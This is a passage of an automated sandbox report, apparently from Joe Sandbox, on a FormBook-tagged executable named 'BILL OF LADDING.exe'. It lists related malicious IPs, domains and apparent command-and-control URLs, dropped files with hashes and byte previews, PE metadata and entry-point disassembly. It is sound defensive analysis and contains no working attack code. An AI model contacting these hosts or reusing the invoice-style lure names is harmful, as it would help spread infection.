                                                                          • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                          Warnings

                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                          Simulations

                                                                          Behavior and APIs

                                                                          TimeTypeDescription
                                                                          06:51:20API Interceptor13758x Sleep call for process: dYBbPgrkLOIMQ.exe modified
                                                                          06:51:25API Interceptor12180913x Sleep call for process: schtasks.exe modified

                                                                          Joe Sandbox View / Context

                                                                          IPs

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          45.33.6.223FvYlbhvZrZ.rtfGet hashmaliciousFormBookBrowse
                                                                          • www.sqlite.org/2020/sqlite-dll-win32-x86-3330000.zip
                                                                          SecuriteInfo.com.Win32.SuspectCrc.23106.21095.xlsxGet hashmaliciousFormBookBrowse
                                                                          • www.sqlite.org/2017/sqlite-dll-win32-x86-3180000.zip
                                                                          LgzpILNkS2.exeGet hashmaliciousFormBookBrowse
                                                                          • www.sqlite.org/2017/sqlite-dll-win32-x86-3170000.zip
                                                                          ncOLm62YLB.exeGet hashmaliciousFormBookBrowse
                                                                          • www.sqlite.org/2018/sqlite-dll-win32-x86-3230000.zip
                                                                          RFQ-TECMARKQATAR PO33109.xlsxGet hashmaliciousFormBookBrowse
                                                                          • www.sqlite.org/2018/sqlite-dll-win32-x86-3240000.zip
                                                                          Payment confirmation 20240911.exeGet hashmaliciousFormBookBrowse
                                                                          • www.sqlite.org/2018/sqlite-dll-win32-x86-3220000.zip
                                                                          PO#86637.exeGet hashmaliciousFormBookBrowse
                                                                          • www.sqlite.org/2019/sqlite-dll-win32-x86-3270000.zip
                                                                          PO #86637.exeGet hashmaliciousFormBookBrowse
                                                                          • www.sqlite.org/2021/sqlite-dll-win32-x86-3360000.zip
                                                                          Paul Meeting Proposal and Schedule.xlsGet hashmaliciousFormBookBrowse
                                                                          • www.sqlite.org/2017/sqlite-dll-win32-x86-3170000.zip
                                                                          Paul Agrotis List.xlsGet hashmaliciousFormBookBrowse
                                                                          • www.sqlite.org/2019/sqlite-dll-win32-x86-3300000.zip
                                                                          65.21.196.90BAJFMONYm2.exeGet hashmaliciousFormBookBrowse
                                                                          • www.070001294.xyz/90jl/
                                                                          5FRWRDOqk7.exeGet hashmaliciousFormBookBrowse
                                                                          • www.030002721.xyz/st0f/?-hF=sZ0LOH4&HPBxr6=OZJ3FWHE8eHsfWE6sR/jZh7GV9NsFGiNmpPQ4eftWQT1hyascoenGoAxdn6KH9WZ2QPSeMYxIK2pDBtCkY1R4v4J1R7l9kCKhVgR/LucEqSnpRqwhg==
                                                                          RQ#071024.exeGet hashmaliciousFormBookBrowse
                                                                          • www.030003302.xyz/1nuz/?LT=aZbPzzPX3H&O47=39evZXa6m7baCAiDcr0ch6V4fD09WsXkaMbScS7vY88jTdTJUv9E9AetrBPXqBlycVnLEijqhZPiEuH/pw4OidZAp+cuSwNE5fzYgJgK5BTkLsTa3g==
                                                                          Arrival notice.exeGet hashmaliciousFormBookBrowse
                                                                          • www.030002304.xyz/u38h/?EZ2lo=iaxEuHPh9M0PkCehiVmYq99vb8GYcF42nF8/pgvOtFqWiDn4lMrJ/WO5nlbDSyDBFBFfwqZzhOOdUgIoiT3LOtzwEygyB6NUSlIKo/1Br+QrM4rsiQ==&7NP=7FXXUPl
                                                                          rpedido-002297.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                          • www.030002626.xyz/49rz/
                                                                          Arrival Notice_pdf.exeGet hashmaliciousFormBookBrowse
                                                                          • www.030002803.xyz/l4gu/
                                                                          P030092024LANDWAY.exeGet hashmaliciousFormBookBrowse
                                                                          • www.030002837.xyz/zl45/
                                                                          LgzpILNkS2.exeGet hashmaliciousFormBookBrowse
                                                                          • www.030002304.xyz/7b6l/
                                                                          ncOLm62YLB.exeGet hashmaliciousFormBookBrowse
                                                                          • www.030003302.xyz/vkua/
                                                                          PO2-2401-0016 (TR).exeGet hashmaliciousFormBookBrowse
                                                                          • www.070001350.xyz/ivyl/

                                                                          Domains

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          webredir.vip.gandi.netfJD7ivEnzm.exeGet hashmaliciousFormBookBrowse
                                                                          • 217.70.184.50
                                                                          5FRWRDOqk7.exeGet hashmaliciousFormBookBrowse
                                                                          • 217.70.184.50
                                                                          jpdy1E8K4A.exeGet hashmaliciousFormBookBrowse
                                                                          • 217.70.184.50
                                                                          IRYzGMMbSw.exeGet hashmaliciousFormBookBrowse
                                                                          • 217.70.184.50
                                                                          SOA SIL TL382920.exeGet hashmaliciousFormBookBrowse
                                                                          • 217.70.184.50
                                                                          PO-78140924.BAT.PDF.exeGet hashmaliciousFormBookBrowse
                                                                          • 217.70.184.50
                                                                          NVOICE FOR THE MONTH OF AUG-24.exeGet hashmaliciousFormBookBrowse
                                                                          • 217.70.184.50
                                                                          CITA#U00c7#U00c3O.exeGet hashmaliciousFormBookBrowse
                                                                          • 217.70.184.50
                                                                          rP0n___87004354.exeGet hashmaliciousFormBookBrowse
                                                                          • 217.70.184.50
                                                                          CYTAT.exeGet hashmaliciousFormBookBrowse
                                                                          • 217.70.184.50
                                                                          www.sqlite.orgFvYlbhvZrZ.rtfGet hashmaliciousFormBookBrowse
                                                                          • 45.33.6.223
                                                                          SecuriteInfo.com.Win32.SuspectCrc.23106.21095.xlsxGet hashmaliciousFormBookBrowse
                                                                          • 45.33.6.223
                                                                          LgzpILNkS2.exeGet hashmaliciousFormBookBrowse
                                                                          • 45.33.6.223
                                                                          ncOLm62YLB.exeGet hashmaliciousFormBookBrowse
                                                                          • 45.33.6.223
                                                                          RFQ-TECMARKQATAR PO33109.xlsxGet hashmaliciousFormBookBrowse
                                                                          • 45.33.6.223
                                                                          Payment confirmation 20240911.exeGet hashmaliciousFormBookBrowse
                                                                          • 45.33.6.223
                                                                          PO#86637.exeGet hashmaliciousFormBookBrowse
                                                                          • 45.33.6.223
                                                                          PO #86637.exeGet hashmaliciousFormBookBrowse
                                                                          • 45.33.6.223
                                                                          Paul Meeting Proposal and Schedule.xlsGet hashmaliciousFormBookBrowse
                                                                          • 45.33.6.223
                                                                          Paul Agrotis List.xlsGet hashmaliciousFormBookBrowse
                                                                          • 45.33.6.223
                                                                          www.sailforever.xyzProducts Order Catalogs20242.exeGet hashmaliciousFormBookBrowse
                                                                          • 103.106.67.112

                                                                          ASNs

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          NTT-LT-ASLTBAJFMONYm2.exeGet hashmaliciousFormBookBrowse
                                                                          • 84.32.84.32
                                                                          oLCnCWQDhK.exeGet hashmaliciousFormBookBrowse
                                                                          • 84.32.84.32
                                                                          N2Qncau2rN.exeGet hashmaliciousFormBookBrowse
                                                                          • 84.32.84.32
                                                                          RQ#071024.exeGet hashmaliciousFormBookBrowse
                                                                          • 84.32.84.32
                                                                          8mmZ7Bkoj1.exeGet hashmaliciousFormBookBrowse
                                                                          • 84.32.84.32
                                                                          Products Order Catalogs20242.exeGet hashmaliciousFormBookBrowse
                                                                          • 84.32.84.32
                                                                          YSjOEAta07.exeGet hashmaliciousFormBookBrowse
                                                                          • 84.32.84.32
                                                                          Pending invoices.exeGet hashmaliciousFormBookBrowse
                                                                          • 84.32.84.32
                                                                          SOA SEPT 2024.exeGet hashmaliciousFormBookBrowse
                                                                          • 84.32.84.32
                                                                          PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                                          • 84.32.84.32
                                                                          CP-ASDEhttps://clickme.thryv.com/ls/click?upn=u001.Als7cfHaJU2yMdsJgpsIFnDa0TAMLVO9WtBTyYEZqZA-3DPrnv_OEO3HRIZ3eedLymwLhvJt9sqs3j4T3CqpVCO9A0ZKplqH1W1Ad1lCPdQBrRfbSauZPLLCLTYBsXDRt8yGG5FOZ7NK342oFTufTBA9n-2F9XZOmYNN4Eos0I-2F5FhDJBI4w4qadztSYeu4ugOMJrD5ZJ3NK5HbR-2B5js4EjZpFmlZJIJ2eepX0b1t3SsV5gyIJGc7CJjeC8X5Wxzv49-2FqOYJzl5qBXpr-2BWwAW7G6cWDOqZN4YK73LjV4xBBNvL9fcHX0SM3SHQjbhXBuKD0dh5WqiuRgt8l7OsZEvxy8UkJaur7KIBjJyVTij7zCSJnYd6mjsUFQl8fAjX9eSOEGKjy2XWh8GHa2xi9VgTVCxGMcn7gM-3DGet hashmaliciousUnknownBrowse
                                                                          • 65.21.29.43
                                                                          BAJFMONYm2.exeGet hashmaliciousFormBookBrowse
                                                                          • 65.21.196.90
                                                                          5FRWRDOqk7.exeGet hashmaliciousFormBookBrowse
                                                                          • 65.21.196.90
                                                                          RQ#071024.exeGet hashmaliciousFormBookBrowse
                                                                          • 65.21.196.90
                                                                          http://dmed-industries.comGet hashmaliciousHtmlDropperBrowse
                                                                          • 65.21.29.43
                                                                          Arrival notice.exeGet hashmaliciousFormBookBrowse
                                                                          • 65.21.196.90
                                                                          https://jumatan.sudaha.biz.id/4F741t%23XjCw%5BYg/Get hashmaliciousUnknownBrowse
                                                                          • 65.21.235.194
                                                                          rpedido-002297.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                          • 65.21.196.90
                                                                          https://www.elightsailorsbank.uksfholdings.com/Get hashmaliciousUnknownBrowse
                                                                          • 65.21.85.206
                                                                          044f.pdf.scrGet hashmaliciousRMSRemoteAdminBrowse
                                                                          • 65.21.245.7
                                                                          TRELLIAN-AS-APTrellianPtyLimitedAUjpdy1E8K4A.exeGet hashmaliciousFormBookBrowse
                                                                          • 103.224.182.242
                                                                          https://pancake-swapp.github.io/Get hashmaliciousHTMLPhisherBrowse
                                                                          • 103.224.212.215
                                                                          https://lil-loveeeees.blogspot.com/Get hashmaliciousUnknownBrowse
                                                                          • 103.224.212.210
                                                                          moba-24.2-installer_M64ZB-1.exeGet hashmaliciousPureLog StealerBrowse
                                                                          • 103.224.212.213
                                                                          https://kuconlogin-ui.godaddysites.com/Get hashmaliciousUnknownBrowse
                                                                          • 103.224.212.211
                                                                          https://upholad__loogin_us.godaddysites.com/Get hashmaliciousUnknownBrowse
                                                                          • 103.224.182.253
                                                                          http://egynte.com/Get hashmaliciousUnknownBrowse
                                                                          • 103.224.182.253
                                                                          CITA#U00c7#U00c3O.exeGet hashmaliciousFormBookBrowse
                                                                          • 103.224.182.242
                                                                          Cotizaci#U00f3n.exeGet hashmaliciousFormBookBrowse
                                                                          • 103.224.182.242
                                                                          PAGO $830.900.exeGet hashmaliciousFormBookBrowse
                                                                          • 103.224.182.242
                                                                          LINODE-APLinodeLLCUSSecuriteInfo.com.PUA.Tool.InstSrv.3.16098.13705.exeGet hashmaliciousUnknownBrowse
                                                                          • 178.79.161.15
                                                                          SecuriteInfo.com.PUA.Tool.InstSrv.3.16098.13705.exeGet hashmaliciousUnknownBrowse
                                                                          • 178.79.161.15
                                                                          http://customer.thewayofmoney.usGet hashmaliciousUnknownBrowse
                                                                          • 198.74.56.166
                                                                          na.elfGet hashmaliciousUnknownBrowse
                                                                          • 139.162.103.220
                                                                          na.elfGet hashmaliciousUnknownBrowse
                                                                          • 50.116.8.209
                                                                          reswnop.exeGet hashmaliciousEmotetBrowse
                                                                          • 178.79.161.166
                                                                          rfc[1].htmlGet hashmaliciousUnknownBrowse
                                                                          • 45.56.79.23
                                                                          https://s.craft.me/yB5midhwwaHUPWGet hashmaliciousHTMLPhisherBrowse
                                                                          • 45.56.77.136
                                                                          https://alquimista.hosted.phplist.com/lists/lt.php?tid=cE0FU1AHDgIFBx4AXQpVFAZXX18ZAwJTUx9QXA8AVFIMCQAEUVZKAFQHUVFfBFYUCloJBRlWDQ1SH15cAl1MUAFUAwIDUgNQUFlSHQxTUg1XUF9VGVIHVgUfUlgOUUxZXAZSGFMFDwxZBFdUWAEDAAGet hashmaliciousUnknownBrowse
                                                                          • 45.33.29.14
                                                                          rfc[1].htmlGet hashmaliciousUnknownBrowse
                                                                          • 45.56.79.23

                                                                          JA3 Fingerprints

                                                                          No context

                                                                          Dropped Files

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          C:\Users\user\AppData\Local\Temp\sqlite3.dllPO#86637.exeGet hashmaliciousFormBookBrowse
                                                                            PO AFHOR9301604.exeGet hashmaliciousFormBookBrowse
                                                                              5890796959.xlsGet hashmaliciousFormBookBrowse
                                                                                PI_order_No202307110.docGet hashmaliciousFormBookBrowse
                                                                                  ,2,3,4,5.xlsGet hashmaliciousFormBookBrowse
                                                                                    DBK_+_RODTEP-checking_List.xlsGet hashmaliciousFormBookBrowse
                                                                                      mv Dragonball.xlsxGet hashmaliciousFormBookBrowse

                                                                                        Created / dropped Files

                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sqlite-dll-win32-x86-3270000[1].zip

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\schtasks.exe
                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                        Category:dropped
                                                                                        Size (bytes):480281
                                                                                        Entropy (8bit):7.998782566236935
                                                                                        Encrypted:true
                                                                                        SSDEEP:12288:Ksi/2nEints+5aKe3l6U67lCctqaihd3lnWt/RUNaprnP+vfkD:Kj/3Ka+5He3l6U6JCE43lWt+N2P+vsD
                                                                                        MD5:2555518E014ABDA6AB2156ACEAA4C25C
                                                                                        SHA1:DBFA5BE3E5AB5705BEA72C62591D1856A69E99A5
                                                                                        SHA-256:81F30FFED254F6660EDA1845240DA62F1A73E94DBAE6DDB564F982825C7E99FE
                                                                                        SHA-512:6984F9BFF3FACF693DCF4D22883E402EBFE673305AB0395EA52881109EA2B467B7D61567E3E8A0CA7FF01A3969FB8E0E384790333C7F5807EAD1EF190623C6AC
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:PK..........HN....(...........sqlite3.defUT....i\\.i\\ux................r.6...y...O_ .f..z.P..."..x.~..?..Hnz..A$A......~.....KI./..w...0-F{..CM..o&|...F?.,..pN...]Z....;...!p..[..pV&.:...=y....Y.g..[@.N..89...x..O.%J..L..o.3x8X..x...=k.~.*4'|.5...n..4.<8..e.pdN.X.kK......(..t.zU...zy........g...;.zQ l.&.....I..U`.....4...S.y.....xg....y@.../f.6...)..WX.......+x..*{.x..82ql..r...D...+.f..&.a.'......~...F.)..z.....Mp,..S...0..&w*F..u..R5.x.L..}...7*..Y.......~..f..a......+&...&.oR...........).........H..I.^s]3Z.8....w.a,.8/|.Y..MX.#.....1`.......5_..].....H....ke..X.p......JK"5....N.+,.........)d.Q.j..g.c.........~....``.Y..Y(4o1....{...H._..z...../.........R.y....5WY.....^....L.U...I.(S...J...I...:......_..v"E.J.qZ..VeG]..gj.H.X...{..aZ......:.T...#.$..H.qh.JE..@IN...i.[8her....|i..9...IDel..%..94.*....L..I.....,I.:.....!...h.^...g....R<.*.4..u.*o.L>.EG{..z..$PX........Y.BX..L...__{.6#@..o)....N... .]..>.......i..5._.F..K...>....G....K....

                                                                                        C:\Users\user\AppData\Local\Temp\6222f67M

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\schtasks.exe
                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 10, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 10
                                                                                        Category:dropped
                                                                                        Size (bytes):77824
                                                                                        Entropy (8bit):1.133993246026424
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:LSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+S:uG8mZMDTJQb3OCaM0f6kL1Vumi
                                                                                        MD5:8BB4851AE9495C7F93B4D8A6566E64DB
                                                                                        SHA1:B16C29E9DBBC1E1FE5279D593811E9E317D26AF7
                                                                                        SHA-256:143AD87B1104F156950A14481112E79682AAD645687DF5E8C9232F4B2786D790
                                                                                        SHA-512:DDFD8A6243C2FC5EE7DAE2EAE8D6EA9A51268382730FA3D409A86165AB41386B0E13E4C2F2AC5556C9748E4A160D19B480D7B0EA23BA0671F921CB9E07637149
                                                                                        Malicious:false
                                                                                        Reputation:moderate, very likely benign file
                                                                                        Preview:SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                        C:\Users\user\AppData\Local\Temp\gtrhl.zip

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\schtasks.exe
                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                        Category:dropped
                                                                                        Size (bytes):480281
                                                                                        Entropy (8bit):7.998782566236935
                                                                                        Encrypted:true
                                                                                        SSDEEP:12288:Ksi/2nEints+5aKe3l6U67lCctqaihd3lnWt/RUNaprnP+vfkD:Kj/3Ka+5He3l6U6JCE43lWt+N2P+vsD
                                                                                        MD5:2555518E014ABDA6AB2156ACEAA4C25C
                                                                                        SHA1:DBFA5BE3E5AB5705BEA72C62591D1856A69E99A5
                                                                                        SHA-256:81F30FFED254F6660EDA1845240DA62F1A73E94DBAE6DDB564F982825C7E99FE
                                                                                        SHA-512:6984F9BFF3FACF693DCF4D22883E402EBFE673305AB0395EA52881109EA2B467B7D61567E3E8A0CA7FF01A3969FB8E0E384790333C7F5807EAD1EF190623C6AC
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:PK..........HN....(...........sqlite3.defUT....i\\.i\\ux................r.6...y...O_ .f..z.P..."..x.~..?..Hnz..A$A......~.....KI./..w...0-F{..CM..o&|...F?.,..pN...]Z....;...!p..[..pV&.:...=y....Y.g..[@.N..89...x..O.%J..L..o.3x8X..x...=k.~.*4'|.5...n..4.<8..e.pdN.X.kK......(..t.zU...zy........g...;.zQ l.&.....I..U`.....4...S.y.....xg....y@.../f.6...)..WX.......+x..*{.x..82ql..r...D...+.f..&.a.'......~...F.)..z.....Mp,..S...0..&w*F..u..R5.x.L..}...7*..Y.......~..f..a......+&...&.oR...........).........H..I.^s]3Z.8....w.a,.8/|.Y..MX.#.....1`.......5_..].....H....ke..X.p......JK"5....N.+,.........)d.Q.j..g.c.........~....``.Y..Y(4o1....{...H._..z...../.........R.y....5WY.....^....L.U...I.(S...J...I...:......_..v"E.J.qZ..VeG]..gj.H.X...{..aZ......:.T...#.$..H.qh.JE..@IN...i.[8her....|i..9...IDel..%..94.*....L..I.....,I.:.....!...h.^...g....R<.*.4..u.*o.L>.EG{..z..$PX........Y.BX..L...__{.6#@..o)....N... .]..>.......i..5._.F..K...>....G....K....

                                                                                        C:\Users\user\AppData\Local\Temp\harrowment

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\BILL OF LADDING.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):286208
                                                                                        Entropy (8bit):7.993439880533603
                                                                                        Encrypted:true
                                                                                        SSDEEP:6144:UXDJZfWPwLYcDNbXgf4brqiQNciQJrvMrLzQGt:c6PwPyf43+fcDMTf
                                                                                        MD5:855CB787A8392433A8E40826255EECA3
                                                                                        SHA1:C2B02D3EA4A3A1E1FAF4AC5616A3F24ACD57E65A
                                                                                        SHA-256:5F37705CA61B652A2814D12002267ED747552C3818AA057B83830171AC118A6A
                                                                                        SHA-512:5F1BCA0A7BCD68B034E78B0A0A89A08B4B72B9EC1EF16CC0E8849827F01436CBB8E78F518BB43C24A5F818F97AD9545C7109824A96B8DEEDEC696FA91C327B71
                                                                                        Malicious:false
                                                                                        Preview:x....PZFL..^...l.PY..iH_...YPWPZFLGAKWI5KYPWPZFLGAKWI5KYP.PZFBX.EW.<.x.V..g./(8w9G$>"6=z%-)/$#iW.y"">z/"g...iX$=5y]WLhGAKWI5K Q^.g&+.|+0..+>.M..v'&.M.e00.@..}+0.g":8j0=.LGAKWI5K..WP.GMG&..+5KYPWPZF.GCJ\H>KY.SPZFLGAKWI.XYPW@ZFL'EKWIuKY@WPZDLGGKWI5KYPQPZFLGAKW)1KYRWPZFLGCK..5KIPW@ZFLGQKWY5KYPWPJFLGAKWI5KYPWPZFLGAKWI5KYPWPZFLGAKWI5KYPWPZFLGAKWI5KYPWPZFLGAKWI5KYPWPZFLGAKWI5KYPWPZFLGAKWI5KYPWPZFLGAKWI5KYPWPZFLGAKWI5KYPWPZFLGAKy=P3-PWP..HGA[WI5.]PW@ZFLGAKWI5KYPWPzFL'AKWI5KYPWPZFLGAKWI5KYPWPZFLGAKWI5KYPWPZFLGAKWI5KYPWPZFLGAKWI5KYPWPZFLGAKWI5KYPWPZFLGAKWI5KYPWPZFLGAKWI5KYPWPZFLGAKWI5KYPWPZFLGAKWI5KYPWPZFLGAKWI5KYPWPZFLGAKWI5KYPWPZFLGAKWI5KYPWPZFLGAKWI5KYPWPZFLGAKWI5KYPWPZFLGAKWI5KYPWPZFLGAKWI5KYPWPZFLGAKWI5KYPWPZFLGAKWI5KYPWPZFLGAKWI5KYPWPZFLGAKWI5KYPWPZFLGAKWI5KYPWPZFLGAKWI5KYPWPZFLGAKWI5KYPWPZFLGAKWI5KYPWPZFLGAKWI5KYPWPZFLGAKWI5KYPWPZFLGAKWI5KYPWPZFLGAKWI5KYPWPZFLGAKWI5KYPWPZFLGAKWI5KYPWPZFLGAKWI5KYPWPZFLGAKWI5KYPWPZFLGAKWI5KYPWPZFLGAKWI5KYPWPZFLGAKWI5KYPWPZFLGAKWI5KYPWPZFLGAKWI5KYPWP

                                                                                        C:\Users\user\AppData\Local\Temp\sqlite3.def

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\schtasks.exe
                                                                                        File Type:ASCII text
                                                                                        Category:dropped
                                                                                        Size (bytes):5537
                                                                                        Entropy (8bit):4.352267516149359
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:GcuN/gR+7Ogn0XRMcGM3KOGOF++BwIMtvrENw+Y0aR:E/Q+7Ogn0RKOBF+++HvrENw+cR
                                                                                        MD5:E8FDCAF1419C66D9916AD24D2FD671EE
                                                                                        SHA1:E82EFDBB5561810E9EBBF80185642821F1B9D17E
                                                                                        SHA-256:CB18BFE294499FEA8EE847148DD497DD20A05B3181E6B6AE8651B24B3D29391B
                                                                                        SHA-512:B66EC534893F19152945BE4F717C2BD0542D88F43C57398CA5B61C74978A8FBB38A8E7144D104E5B254B50E1BCC9F158CA183A1D472708DA1A4AA356DEA9569F
                                                                                        Malicious:false
                                                                                        Preview:EXPORTS.sqlite3_aggregate_context.sqlite3_aggregate_count.sqlite3_auto_extension.sqlite3_backup_finish.sqlite3_backup_init.sqlite3_backup_pagecount.sqlite3_backup_remaining.sqlite3_backup_step.sqlite3_bind_blob.sqlite3_bind_blob64.sqlite3_bind_double.sqlite3_bind_int.sqlite3_bind_int64.sqlite3_bind_null.sqlite3_bind_parameter_count.sqlite3_bind_parameter_index.sqlite3_bind_parameter_name.sqlite3_bind_pointer.sqlite3_bind_text.sqlite3_bind_text16.sqlite3_bind_text64.sqlite3_bind_value.sqlite3_bind_zeroblob.sqlite3_bind_zeroblob64.sqlite3_blob_bytes.sqlite3_blob_close.sqlite3_blob_open.sqlite3_blob_read.sqlite3_blob_reopen.sqlite3_blob_write.sqlite3_busy_handler.sqlite3_busy_timeout.sqlite3_cancel_auto_extension.sqlite3_changes.sqlite3_clear_bindings.sqlite3_close.sqlite3_close_v2.sqlite3_collation_needed.sqlite3_collation_needed16.sqlite3_column_blob.sqlite3_column_bytes.sqlite3_column_bytes16.sqlite3_column_count.sqlite3_column_database_name.sqlite3_column_database_name16.sqlite3_colum

                                                                                        C:\Users\user\AppData\Local\Temp\sqlite3.dll

                                                                                        Download File
                                                                                        Process:C:\Windows\SysWOW64\schtasks.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):916693
                                                                                        Entropy (8bit):6.515298049291402
                                                                                        Encrypted:false
                                                                                        SSDEEP:24576:uY80dlS9SDd59YfRAbaJJs1E8NIGG6lmd//V:uY8iSa2RAbaJJsO8NIGGoG
                                                                                        MD5:1EB6ACF76A15B74B38333AF47DC1218D
                                                                                        SHA1:A3FBC817F59B6A8899DC338CC15A75CDD17DFFF1
                                                                                        SHA-256:A5EF3A78EB333B0E6DCA194EA711DCBB036119A788ECFE125F05176FB0FB70A3
                                                                                        SHA-512:717931AA928DE150ABBB70D523C7DBD472BFA6C511AB55E0B50DF8D9661D33635156ED7B750285FA383CDD4064F225EA022F0BEAD3E066EE2BEBA84EF5731C15
                                                                                        Malicious:false
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                        Joe Sandbox View:
                                                                                        • Filename: PO#86637.exe, Detection: malicious, Browse
                                                                                        • Filename: PO AFHOR9301604.exe, Detection: malicious, Browse
                                                                                        • Filename: 5890796959.xls, Detection: malicious, Browse
                                                                                        • Filename: PI_order_No202307110.doc, Detection: malicious, Browse
                                                                                        • Filename: ,2,3,4,5.xls, Detection: malicious, Browse
                                                                                        • Filename: DBK_+_RODTEP-checking_List.xls, Detection: malicious, Browse
                                                                                        • Filename: mv Dragonball.xlsx, Detection: malicious, Browse
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....i\\...........!.....Z...................p.....a................................Q/........ .......................... ......H.... .......................0...3...................................................................................text....X.......Z..................`.P`.data........p.......`..............@.`..rdata........... ...|..............@.`@.bss....(.............................`..edata... ......."..................@.0@.idata..H...........................@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc........ ......................@.0..reloc...3...0...4..................@.0B/4...........p......................@.@B/19................................@..B/31.......... ......................@..B/45..........@......................@..B/57..........`......................@.0B/70.....i....p..........

                                                                                        Static File Info

                                                                                        General

                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                        Entropy (8bit):7.528435253305882
                                                                                        TrID:
                                                                                        • Win32 Executable (generic) a (10002005/4) 95.11%
                                                                                        • AutoIt3 compiled script executable (510682/80) 4.86%
                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                        File name:BILL OF LADDING.exe
                                                                                        File size:1'356'685 bytes
                                                                                        MD5:570d898d83e3499d7dce63b784b4d77e
                                                                                        SHA1:f30fcdb3526fae21b709712f02e927e37226dd79
                                                                                        SHA256:d9ffe4a3e77a61cc793c292cb9013ab0362bd1c57fe3e652f24cf93a075e6297
                                                                                        SHA512:41c77880b86e9ab50a43717db96b3fd0f02ca9fbfc14004f57114c1687f3cb70a3b7dbfb05a034cc33908abaf65e5ce91d55a833a1bd5c9610874028d4771c98
                                                                                        SSDEEP:24576:ffmMv6Ckr7Mny5QLDyXv3S9hRYpeHatlyVcQxu5Y+CCQAASo2:f3v+7/5QLDavwzOtly2zOjAA+
                                                                                        TLSH:B955F112B3D680F6E9A33971297BE32BEB3575194327C48BA7E02E779E211015B37361
                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-...i...i...i.....9.k...`.:.w...`.,.....`.+.P...N%..c...N%..H...i...d...`. ./...w.:.k...w.;.h...i.8.h...`.>.h...Richi..........

                                                                                        File Icon

                                                                                        Icon Hash:1733312925935517

                                                                                        Static PE Info

                                                                                        General

                                                                                        Entrypoint:0x416310
                                                                                        Entrypoint Section:.text
                                                                                        Digitally signed:false
                                                                                        Imagebase:0x400000
                                                                                        Subsystem:windows gui
                                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                        DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                        Time Stamp:0x4B93CF87 [Sun Mar 7 16:08:39 2010 UTC]
                                                                                        TLS Callbacks:
                                                                                        CLR (.Net) Version:
                                                                                        OS Version Major:5
                                                                                        OS Version Minor:0
                                                                                        File Version Major:5
                                                                                        File Version Minor:0
                                                                                        Subsystem Version Major:5
                                                                                        Subsystem Version Minor:0
                                                                                        Import Hash:aaaa8913c89c8aa4a5d93f06853894da

                                                                                        Entrypoint Preview

                                                                                        Instruction
                                                                                        call 00007F9C5CDA884Ch
                                                                                        jmp 00007F9C5CD9C61Eh
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        push ebp
                                                                                        mov ebp, esp
                                                                                        push edi
                                                                                        push esi
                                                                                        mov esi, dword ptr [ebp+0Ch]
                                                                                        mov ecx, dword ptr [ebp+10h]
                                                                                        mov edi, dword ptr [ebp+08h]
                                                                                        mov eax, ecx
                                                                                        mov edx, ecx
                                                                                        add eax, esi
                                                                                        cmp edi, esi
                                                                                        jbe 00007F9C5CD9C7AAh
                                                                                        cmp edi, eax
                                                                                        jc 00007F9C5CD9C94Ah
                                                                                        cmp ecx, 00000100h
                                                                                        jc 00007F9C5CD9C7C1h
                                                                                        cmp dword ptr [004A94E0h], 00000000h
                                                                                        je 00007F9C5CD9C7B8h
                                                                                        push edi
                                                                                        push esi
                                                                                        and edi, 0Fh
                                                                                        and esi, 0Fh
                                                                                        cmp edi, esi
                                                                                        pop esi
                                                                                        pop edi
                                                                                        jne 00007F9C5CD9C7AAh
                                                                                        pop esi
                                                                                        pop edi
                                                                                        pop ebp
                                                                                        jmp 00007F9C5CD9CC0Ah
                                                                                        test edi, 00000003h
                                                                                        jne 00007F9C5CD9C7B7h
